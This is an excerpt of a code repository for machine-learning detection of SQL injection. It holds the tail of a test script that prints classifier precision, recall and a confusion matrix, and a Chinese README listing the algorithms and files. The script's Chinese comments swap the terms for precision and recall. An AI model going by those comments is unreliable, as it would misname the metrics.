49 | mode=test_c(flag,sql_flag)
50 | test_data,test_target=test_data(mode)
51 | y_pred=clf.predict(test_data)#预测
52 | print("y_pred:%s"%y_pred)
53 | print("test_target:%s"%test_target)
54 | #Verify
55 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率
56 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率
57 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵
58 |
59 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ML-for-SQL-Injection
2 | 机器学习检测SQL注入
3 |
4 | 本项目是使用机器学习算法来分类SQL注入语句与正常语句:
5 | 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。
6 | data是收集的样本数据
7 | file中存放的是训练好的各个模型
8 | featurepossess.py是对原始样本进行预处理,提特征。
9 | sqlsvm.py等py文件是训练模型
10 | testsql是对训练好的模型进行测试,用准确率来度量模型效果。
11 |
--------------------------------------------------------------------------------